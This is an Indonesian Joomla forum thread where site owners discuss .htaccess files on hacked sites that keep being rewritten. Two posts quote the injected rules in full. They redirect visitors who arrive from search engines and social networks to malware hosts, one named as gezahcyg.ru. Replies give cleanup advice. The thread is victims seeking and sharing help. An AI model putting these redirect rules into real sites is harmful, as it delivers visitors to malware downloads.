Joomla Indonesia

Login or Sign Up
Sign In or Register
Avatar
Not Registered Yet?

Join Now! It's FREE. Get full access and benefit from this site

Reset My password - Remind Me My username

Username
Password
Remember me
  • Page:
  • 1
  • 2

TOPIC: joomla 2.5.6 file .htaccess selalu kena hack

joomla 2.5.6 file .htaccess selalu kena hack 6 years 8 months ago #177852

  • oho
  • oho's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 26
  • Karma: 0
para master sekalian, saya mohon bantuannya, salah satu web saya kena serangan malware, sudah saya coba upload ulang sebanyak tiga kali, dan untuk yang ketiga kalinya kena malware juga, muncul peringatan malware detected

saya cek file .htaccess isinya sudah berganti, selama upload tiga kali isinya juga berbeda beda,
intinya ketika kita memaksa mengakses website tersebut secara otomatis akan mendowload file2 malware

sekali lagi saya mohon bantuannya
Last Edit: 6 years 8 months ago by oho.
The administrator has disabled public write access.

Re:joomla 2.5.6 file .htaccess selalu kena hack 6 years 8 months ago #177919

  • eka_dana
  • eka_dana's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 4
  • Karma: 0
apakah file htaccess anda seperti ini :
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace).(.*) RewriteRule ^(.*)$ xxxxxx.xx/xxxxxxx [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline).(.*) RewriteRule ^(.*)$ xxxxxxxxxxxxxxx.xx/xxxxx [R=301,L] </IfModule>
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE

..................................

jika benar seperti diatas, maka sama seperti yang saya alami sekarang.

Kemungkinan ada script file yang merubah dan menyebarkan file htaccess menyebar ke semua directory .

Saya juga menggunakan WP system, diserang juga. ada kemungkinan dari system WP ini juga Gan.
Visit me at www.ekadana.com
Last Edit: 6 years 8 months ago by eka_dana.
The administrator has disabled public write access.

Re:joomla 2.5.6 file .htaccess selalu kena hack 6 years 8 months ago #177924

  • oho
  • oho's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 26
  • Karma: 0
yang sekarang isinya gini gan

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru).(.*)
RewriteRule ^(.*)$ gezahcyg.ru/count18.php [R=301,L]
</IfModule>

#/c3284d#

kalo diakses pake IE antivirus McAfee saya ngebaca gini gan
Attachments:
Last Edit: 6 years 8 months ago by oho.
The administrator has disabled public write access.

Re:joomla 2.5.6 file .htaccess selalu kena hack 6 years 8 months ago #177925

  • oho
  • oho's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 26
  • Karma: 0
Attachments:
The administrator has disabled public write access.

Re:joomla 2.5.6 file .htaccess selalu kena hack 6 years 8 months ago #177927

  • eka_dana
  • eka_dana's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 4
  • Karma: 0
Tadi malam saya sempat beberapa kali memperbaiki file htaccess ini,
namun dalam tempo 5 menit kemudian kembali tersisipkan malware yang
pengarahannya yang berbeda.

Anehnya kenapa selalu di direct ke daerah Rusia sana. :dry:

setelah 12 jam website saya di tutup untuk sementara dan hasilnya
untuk saat ini website saya sudah tidak ada gangguan di htaccess.

Namun saya masih offline kan untuk melihat perkembanganya.

Saran saya :

1. Minta bantuan ke Support webhosting anda mentutup sementara.(12 jam)
2. Segera periksa Component, Plugin atau Modules yang terinstal.
karena adanya kemungkinan ada script / lubang untuk menyusup.
3. Segera update system joomla atau yang lainnya.

Semoga Sukses.
Visit me at www.ekadana.com
Last Edit: 6 years 8 months ago by eka_dana.
The administrator has disabled public write access.

Re:joomla 2.5.6 file .htaccess selalu kena hack 6 years 7 months ago #178225

saya juga nih.. capek memperbaikinya, tolong dong siapa yang bisa.
www.pokjarjohor.org :(
The administrator has disabled public write access.
  • Page:
  • 1
  • 2
Moderators: alvino, rajasetan, willkhu, KhanTry
Time to create page: 0.128 seconds

Diskusi Terakhir

  • No posts to display.

Joomla User Group Indonesia

Joomla User Group indonesia

Id-joomla.com adalah situs resmi Joomla User Group (JUG) Indonesia dan Joomla Translation Team

 
Download Terjemahan Joomla terakreditasi dari JoomlaCode dan laporkan bugs, ide dan saran nya di Sub Forum Hanacaraka

Socials

twitter id joomlafb idjoomla